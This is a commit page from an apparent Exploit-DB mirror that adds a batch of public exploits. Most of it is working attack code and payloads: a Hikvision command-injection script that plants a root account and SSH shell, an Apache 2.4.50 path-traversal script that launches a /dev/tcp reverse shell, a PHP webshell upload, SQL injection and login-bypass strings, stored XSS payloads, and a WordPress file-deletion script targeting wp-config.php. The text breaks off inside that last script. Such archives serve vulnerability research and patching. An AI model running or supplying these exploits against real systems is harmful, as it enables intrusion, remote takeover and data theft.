bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-26

Browse source 
17 changes to exploits/shellcodes

Netgear Genie 2.4.64 - Unquoted Service Path
OpenClinic GA 5.194.18 - Local Privilege Escalation
Gestionale Open 11.00.00 - Local Privilege Escalation

Hikvision Web Server Build 210702 - Command Injection
WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
Engineers Online Portal 1.0 - 'id' SQL Injection
WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
This commit is contained in:
Offensive Security 2021-10-26 05:02:12 +00:00
parent 4f2cf56b31
commit 358c35770a
18 changed files with 1179 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/asp/webapps/50445.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
# Date: 24/10/2021
# Exploit Author: Nehru Sethuraman
# Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
# Version: 21.0817
# Build: 3
# Google Dorks: intitle:buildsmart accounting
# Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014
Exploit Details:
URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=
*HTTP Method:* POST
*POST DATA:*
VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=
Vulnerable Parameter: eidValue
SQL Injection Type: Stacked queries
Payload: ';WAITFOR DELAY '0:0:3'--

330
exploits/hardware/webapps/50441.py Executable file
View file

@ -0,0 +1,330 @@
# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
# Exploit Author: bashis
# Vendor Homepage: https://www.hikvision.com/
# Version: 1.0
# CVE: CVE-2021-36260
# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
# All credit to Watchful_IP
#!/usr/bin/env python3
"""
Note:
1) This code will _not_ verify if remote is Hikvision device or not.
2) Most of my interest in this code has been concentrated on how to
reliably detect vulnerable and/or exploitable devices.
Some devices are easy to detect, verify and exploit the vulnerability,
other devices may be vulnerable but not so easy to verify and exploit.
I think the combined verification code should have very high accuracy.
3) 'safe check' (--check) will try write and read for verification
'unsafe check' (--reboot) will try reboot the device for verification
[Examples]
Safe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Safe and unsafe vulnerability/verify check:
(will only use 'unsafe check' if not verified with 'safe check')
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Unsafe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Launch and connect to SSH shell:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Execute command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Execute blind command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"
$./CVE-2021-36260.py -h
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]
[--reboot] [--shell] [--cmd CMD]
[--cmd_blind CMD_BLIND] [--noverify]
[--proto {http,https}]
optional arguments:
-h, --help show this help message and exit
--rhost RHOST Remote Target Address (IP/FQDN)
--rport RPORT Remote Target Port
--check Check if vulnerable
--reboot Reboot if vulnerable
--shell Launch SSH shell
--cmd CMD execute cmd (i.e: "ls -l")
--cmd_blind CMD_BLIND
execute blind cmd (i.e: "reboot")
--noverify Do not verify if vulnerable
--proto {http,https} Protocol used
$
"""
import os
import argparse
import time
import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions
class Http(object):
def __init__(self, rhost, rport, proto, timeout=60):
super(Http, self).__init__()
self.rhost = rhost
self.rport = rport
self.proto = proto
self.timeout = timeout
self.remote = None
self.uri = None
""" Most devices will use self-signed certificates, suppress any warnings """
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
self.remote = requests.Session()
self._init_uri()
self.remote.headers.update({
'Host': f'{self.rhost}:{self.rport}',
'Accept': '*/*',
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
})
"""
self.remote.proxies.update({
# 'http': 'http://127.0.0.1:8080',
})
"""
def send(self, url=None, query_args=None, timeout=5):
if query_args:
"""Some devices can handle more, others less, 22 bytes seems like a good compromise"""
if len(query_args) > 22:
print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
return None
"""This weird code will try automatically switch between http/https
and update Host
"""
try:
if url and not query_args:
return self.get(url, timeout)
else:
data = self.put('/SDK/webLanguage', query_args, timeout)
except requests.exceptions.ConnectionError:
self.proto = 'https' if self.proto == 'http' else 'https'
self._init_uri()
try:
if url and not query_args:
return self.get(url, timeout)
else:
data = self.put('/SDK/webLanguage', query_args, timeout)
except requests.exceptions.ConnectionError:
return None
except requests.exceptions.RequestException:
return None
except KeyboardInterrupt:
return None
"""302 when requesting http on https enabled device"""
if data.status_code == 302:
redirect = data.headers.get('Location')
self.uri = redirect[:redirect.rfind('/')]
self._update_host()
if url and not query_args:
return self.get(url, timeout)
else:
data = self.put('/SDK/webLanguage', query_args, timeout)
return data
def _update_host(self):
if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
self.remote.headers.update({
'Host': self.uri[self.uri.rfind('://') + 3:],
})
def _init_uri(self):
self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))
def put(self, url, query_args, timeout):
"""Command injection in the <language> tag"""
query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
f'<language>$({query_args})</language>'
return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)
def get(self, url, timeout):
return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)
def check(remote, args):
"""
status_code == 200 (OK);
Verified vulnerable and exploitable
status_code == 500 (Internal Server Error);
Device may be vulnerable, but most likely not
The SDK webLanguage tag is there, but generate status_code 500 when language not found
I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
(Issue: Could also be other directory than 'webLib', r/o FS etc...)
status_code == 401 (Unauthorized);
Defiantly not vulnerable
"""
if args.noverify:
print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
return True
print(f'[*] Checking remote "{args.rhost}:{args.rport}"')
data = remote.send(url='/', query_args=None)
if data is None:
print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
return None
print('[i] ETag:', data.headers.get('ETag'))
data = remote.send(query_args='>webLib/c')
if data is None or data.status_code == 404:
print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
return False
status_code = data.status_code
data = remote.send(url='/c', query_args=None)
if not data.status_code == 200:
"""We could not verify command injection"""
if status_code == 500:
print(f'[-] Could not verify if vulnerable (Code: {status_code})')
if args.reboot:
return check_reboot(remote, args)
else:
print(f'[+] Remote is not vulnerable (Code: {status_code})')
return False
print('[!] Remote is verified exploitable')
return True
def check_reboot(remote, args):
"""
We sending 'reboot', wait 2 sec, then checking with GET request.
- if there is data returned, we can assume remote is not vulnerable.
- If there is no connection or data returned, we can assume remote is vulnerable.
"""
if args.check:
print('[i] Checking if vulnerable with "reboot"')
else:
print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
remote.send(query_args='reboot')
time.sleep(2)
if not remote.send(url='/', query_args=None):
print('[!] Remote is vulnerable')
return True
else:
print('[+] Remote is not vulnerable')
return False
def cmd(remote, args):
if not check(remote, args):
return False
data = remote.send(query_args=f'{args.cmd}>webLib/x')
if data is None:
return False
data = remote.send(url='/x', query_args=None)
if data is None or not data.status_code == 200:
print(f'[!] Error execute cmd "{args.cmd}"')
return False
print(data.text)
return True
def cmd_blind(remote, args):
"""
Blind command injection
"""
if not check(remote, args):
return False
data = remote.send(query_args=f'{args.cmd_blind}')
if data is None or not data.status_code == 500:
print(f'[-] Error execute cmd "{args.cmd_blind}"')
return False
print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
return True
def shell(remote, args):
if not check(remote, args):
return False
data = remote.send(url='/N', query_args=None)
if data.status_code == 404:
print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
data = remote.send(query_args='echo -n P::0:0:W>N')
if data.status_code == 401:
print(data.headers)
print(data.text)
return False
remote.send(query_args='echo :/:/bin/sh>>N')
remote.send(query_args='cat N>>/etc/passwd')
remote.send(query_args='dropbear -R -B -p 1337')
remote.send(query_args='cat N>webLib/N')
else:
print(f'[i] Remote "{args.rhost}" already pwned')
print(f'[*] Trying SSH to {args.rhost} on port 1337')
os.system(f'stty echo; stty iexten; stty icanon; \
ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
P@{args.rhost} -p 1337')
def main():
print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')
parser = argparse.ArgumentParser()
parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
parser.add_argument(
'--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
)
parser.add_argument(
'--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
)
args = parser.parse_args()
remote = Http(args.rhost, args.rport, args.proto)
try:
if args.shell:
shell(remote, args)
elif args.cmd:
cmd(remote, args)
elif args.cmd_blind:
cmd_blind(remote, args)
elif args.check:
check(remote, args)
elif args.reboot:
check_reboot(remote, args)
else:
parser.parse_args(['-h'])
except KeyboardInterrupt:
return False
if __name__ == '__main__':
main()

21
exploits/multiple/webapps/50446.sh Executable file
View file

@ -0,0 +1,21 @@
# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
# Credits: Ash Daulton & cPanel Security Team
# Date: 24/07/2021
# Exploit Author: TheLastVvV.com
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.50 with CGI enable
# Tested on : Debian 5.10.28
# CVE : CVE-2021-42013
#!/bin/bash
echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'
if [ $# -eq 0 ]
then
echo "try: ./$0 http://ip:port LHOST LPORT"
exit 1
fi
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh"
#usage chmod -x CVE-2021-42013.sh
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

26
exploits/php/webapps/50442.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 23-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/simple-tags/
# Tested on Windows
# CVE: CVE-2021-24444
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444
# Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b
How to reproduce vulnerability:
1. Install Latest WordPress
2. Install and activate TaxoPress Version 3.0.7.1
3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions'
and enter the data into the user input field.
4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)>
5. You will observe that the payload successfully got stored into the
database and when you are triggering the same functionality in that
time JavaScript payload is executing successfully and we are getting a
pop-up.

98
exploits/php/webapps/50444.txt Normal file
View file

@ -0,0 +1,98 @@
# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
# Date: 10/23/2021
# Exploit Author: SadKris
# Venor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Version: 1.0
# Tested on: XAMPP, Windows 11
# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------
# Request sent as base user
POST /EngineerShit/teacher_avatar.php HTTP/1.1
Host: localhost.me
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost.me
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost.me/EngineerShit/dasboard_teacher.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="image"; filename="vuln.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="change"
# Response
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:51:19 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
window.location = "dasboard_teacher.php";
</script>
# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------
GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1
Host: localhost.me
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close
# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:54:07 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 154
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
gottem bois

56
exploits/php/webapps/50447.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker
An example request to trigger the SQL-Injection:
POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"
{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"
1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"
form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"
2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"
Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"
http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"
0
------WebKitFormBoundaryTAak6w3vHUykgInT--

41
exploits/php/webapps/50450.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip
# Version: 1.0
# Tested on: Linux
# Vulnerable page: HOLY
# Vulnerable Parameters: "reason"
Technical description:
A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more.
Steps to exploit:
1) Navigate to http://localhost/event-management/views/?v=HOLY
2) Insert your payload in the "reason" parameter
3) Click "Add holiday"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
<script>alert("This is an XSS")</script>
---
POST /event-management/api/process.php?cmd=holiday HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://localhost
Connection: close
Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted.
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1
date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E
---

61
exploits/php/webapps/50451.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE : cve-2021-42664
# Vulnerable page: add_quiz.php
# Vulnerable Parameters: "quiz_title", "description"
Technical description:
A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more.
Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php
2) Insert your payload in the "quiz_title" parameter or the "description" parameter
3) Click save
Proof of concept (Poc):
The following payload will allow you to run the javascript -
<script>alert("This is an XSS Give me your cookies")</script>
---
POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1
quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save=
OR
POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1
quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save=
---

60
exploits/php/webapps/50452.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: login.php
# VUlnerable parameters: "username", "password"
Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication.
Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php
2) Insert your payload in the user or password field
3) Click login
Proof of concept (Poc):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -
' OR '1'='1';-- -
---
POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
username='+or+'1'%3D'1'%3B--+-&password=sqli
OR
POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
username=sqli&password='+or+'1'%3D'1'%3B--+-
---

36
exploits/php/webapps/50453.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: quiz_question.php
# Vulnerable Parameter: "id"
Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed.
As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
2) Insert your payload in the id parameter
Proof of concept (Poc):
The following payload will allow you to extract the MySql server version running on the web server -
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -
---
GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1
---

19
exploits/php/webapps/50454.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
# Date: 25-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://wordpress.org/plugins/media-tags/
# Software Link: www.codehooligans.com/projects/wordpress/media-tags/
# Version: 3.2.0.2
# Tested on Windows
*How to reproduce vulnerability:*
1. Install Latest WordPress
2. Install and activate Media-Tags <= 3.2.0.2
3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field.
4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)>
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

18
exploits/php/webapps/50455.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
# Date: 25-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/
# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
# Version: 4.1.7
# Tested on Windows
*How to reproduce vulnerability:*
1. Install Latest WordPress
2. Install and activate Ninja Tables <= 4.1.7
3. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'
and enter the data into the user input field.Then Navigate to Table Design
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

66
exploits/php/webapps/50456.js Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
# Date: 04/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
# Version: 4.9.6
# Tested on: Linux - Debian Buster (PHP 7.3)
# Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
# EDB : EDB-44949
# CVE : CVE-2018-12895
/*
Usage:
1. Login to wordpress with privileges of an author
2. Navigates to Media > Add New > Select Files > Open/Upload
3. Click Edit > Open Developer Console > Paste this exploit script
4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
*/
function unlink_thumb(thumb) {
$nonce_id = document.getElementById("_wpnonce").value
if (thumb == null) {
console.log("specify a file to delete")
return false
}
if ($nonce_id == null) {
console.log("the nonce id is not found")
return false
}
fetch(window.location.href.replace("&action=edit",""),
{
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
})
.then(function(resp0) {
if (resp0.redirected) {
$del = document.getElementsByClassName("submitdelete deletion").item(0).href
if ($del == null) {
console.log("Unknown error: could not find the url action")
return false
}
fetch($del,
{
method: 'GET',
credentials: 'include'
}).then(function(resp1) {
if (resp1.redirected) {
console.log("Arbitrary file deletion of " + thumb + " succeed!")
return true
} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
